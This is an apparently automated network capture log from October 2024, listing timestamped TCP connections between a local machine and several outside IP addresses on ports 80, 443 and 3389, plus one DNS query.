                                                                              Oct 8, 2024 03:23:05.730663061 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730673075 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730688095 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730695963 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730709076 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.730719090 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730730057 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730740070 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.730752945 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730760098 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.730767012 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730777025 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730792046 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730799913 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.730823994 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.730848074 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730856895 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730874062 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730880976 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730891943 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.730910063 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.730937958 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730952024 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730954885 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730971098 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730986118 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730997086 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.730998039 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.731023073 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.731034040 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.731065035 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731076002 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731091022 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731101036 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731103897 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.731118917 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731128931 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731142998 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.731158018 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.731172085 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731183052 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731198072 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731224060 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731225014 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.731235027 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731255054 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731257915 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.731280088 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731287956 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.731298923 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731307983 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731333017 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.731353045 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731400013 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.731405020 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731415033 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731443882 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731446981 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.731455088 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731471062 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731479883 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731491089 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.731498003 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.731518030 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.732601881 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.732623100 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.732635975 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.732647896 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.732682943 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.732711077 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.732729912 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.732739925 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.732753992 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.732763052 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.732764959 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.732789040 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.734071016 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.734080076 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.734096050 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.734118938 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.734146118 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.734174013 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.734184027 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.734204054 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.734219074 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.734219074 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.734229088 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.734256029 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.736211061 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.736224890 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.736239910 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.736248016 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.736262083 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.736273050 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.736275911 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.736305952 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.736308098 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.736319065 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.736356020 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905215979 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905215979 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905227900 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905251026 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905253887 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905262947 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905280113 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905298948 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905311108 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905318022 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905322075 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905373096 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905383110 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905395985 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905399084 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905411959 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905452013 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905463934 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905481100 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905487061 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905494928 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905509949 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905513048 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905541897 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905544043 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905551910 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905580997 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905591011 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905605078 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905616999 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905630112 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905684948 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905694962 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905713081 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905719995 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905745029 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905755997 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905769110 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905771971 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905791044 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905900002 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905910015 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905931950 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905937910 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905950069 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905961990 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905972958 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.905981064 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905991077 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.905992985 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906016111 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906043053 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906053066 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906075954 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906090975 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906094074 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906105042 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906121969 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906126976 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906132936 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906152010 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906157017 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906163931 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906182051 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906183004 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906218052 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906219006 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906230927 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906261921 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906276941 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906286001 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906305075 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906326056 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906369925 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906383991 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906393051 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906408072 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906413078 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906424999 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.906429052 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.906456947 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.907815933 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.907845974 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.907855034 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.907883883 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.907893896 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.907898903 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.907923937 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.907927990 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.907938004 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.907960892 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.907967091 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.908004999 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.909611940 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.909622908 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.909634113 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.909661055 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.909683943 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.909694910 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.909710884 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.909718990 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.909719944 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.909737110 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.909759045 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.909770966 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.921902895 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.921942949 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.921957016 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.921977997 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.922019005 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922033072 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922048092 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922050953 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.922063112 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922080040 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.922084093 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922111034 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.922123909 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922137976 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922163963 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.922205925 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922215939 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922233105 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922245979 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922249079 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.922272921 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.922316074 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922332048 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922347069 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922357082 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922367096 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.922377110 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922403097 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.922416925 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922427893 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.922452927 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.959064007 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.959095001 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.959116936 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.959122896 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.959127903 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.959146976 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.959152937 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.959163904 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.959182024 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.959182024 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.959225893 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.982518911 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.982532024 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.982554913 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.982564926 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.982568026 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.982583046 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.982616901 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.982625961 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.982630014 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.982646942 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.982670069 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.982681990 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.986016035 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.986072063 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.986097097 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.986103058 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.986113071 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.986114025 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.986121893 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.986126900 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.986133099 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.986227989 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.992165089 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.992186069 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.992197037 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.992212057 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.992232084 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.992250919 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.992269039 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.992280006 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.992292881 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.992316008 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.992325068 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.992326021 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.992356062 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:06.033905029 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:43.177139044 CEST4971080192.168.2.8104.26.12.205
                                                                              Oct 8, 2024 03:23:43.182027102 CEST8049710104.26.12.205192.168.2.8
                                                                              Oct 8, 2024 03:23:43.182207108 CEST4971080192.168.2.8104.26.12.205
                                                                              Oct 8, 2024 03:23:43.182337046 CEST4971080192.168.2.8104.26.12.205
                                                                              Oct 8, 2024 03:23:43.187063932 CEST8049710104.26.12.205192.168.2.8
                                                                              Oct 8, 2024 03:23:43.656218052 CEST8049710104.26.12.205192.168.2.8
                                                                              Oct 8, 2024 03:23:43.658847094 CEST497113389192.168.2.88.46.123.33
                                                                              Oct 8, 2024 03:23:43.663743973 CEST3389497118.46.123.33192.168.2.8
                                                                              Oct 8, 2024 03:23:43.663821936 CEST497113389192.168.2.88.46.123.33
                                                                              Oct 8, 2024 03:23:43.664128065 CEST497113389192.168.2.88.46.123.33
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 03:23:43.669003963 CEST | 3389 | 49711 | 8.46.123.33 | 192.168.2.8
Oct 8, 2024 03:23:43.669380903 CEST | 49711 | 3389 | 192.168.2.8 | 8.46.123.33
Oct 8, 2024 03:23:43.669517040 CEST | 49710 | 80 | 192.168.2.8 | 104.26.12.205
Oct 8, 2024 03:23:43.674329042 CEST | 80 | 49710 | 104.26.12.205 | 192.168.2.8
Oct 8, 2024 03:23:43.773303986 CEST | 80 | 49710 | 104.26.12.205 | 192.168.2.8
Oct 8, 2024 03:23:43.830863953 CEST | 49710 | 80 | 192.168.2.8 | 104.26.12.205
Oct 8, 2024 03:23:43.885102987 CEST | 49712 | 443 | 192.168.2.8 | 188.114.96.3
Oct 8, 2024 03:23:43.885139942 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.8
Oct 8, 2024 03:23:43.885199070 CEST | 49712 | 443 | 192.168.2.8 | 188.114.96.3
Oct 8, 2024 03:23:43.896358967 CEST | 49712 | 443 | 192.168.2.8 | 188.114.96.3
Oct 8, 2024 03:23:43.896378040 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.8
Oct 8, 2024 03:23:44.367943048 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.8
Oct 8, 2024 03:23:44.368017912 CEST | 49712 | 443 | 192.168.2.8 | 188.114.96.3
Oct 8, 2024 03:23:44.373521090 CEST | 49712 | 443 | 192.168.2.8 | 188.114.96.3
Oct 8, 2024 03:23:44.373533010 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.8
Oct 8, 2024 03:23:44.373780012 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.8
Oct 8, 2024 03:23:44.424592972 CEST | 49712 | 443 | 192.168.2.8 | 188.114.96.3
Oct 8, 2024 03:23:44.487854004 CEST | 49712 | 443 | 192.168.2.8 | 188.114.96.3
Oct 8, 2024 03:23:44.535413027 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.8
Oct 8, 2024 03:23:44.584709883 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.8
Oct 8, 2024 03:23:44.585036993 CEST | 49712 | 443 | 192.168.2.8 | 188.114.96.3
Oct 8, 2024 03:23:44.585057974 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.8
Oct 8, 2024 03:23:44.866015911 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.8
Oct 8, 2024 03:23:44.866087914 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.8
Oct 8, 2024 03:23:44.866168976 CEST | 49712 | 443 | 192.168.2.8 | 188.114.96.3
Oct 8, 2024 03:23:44.874368906 CEST | 49712 | 443 | 192.168.2.8 | 188.114.96.3
Oct 8, 2024 03:23:55.008536100 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:55.008897066 CEST | 49710 | 80 | 192.168.2.8 | 104.26.12.205
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 03:23:43.018959045 CEST | 56591 | 53 | 192.168.2.8 | 1.1.1.1
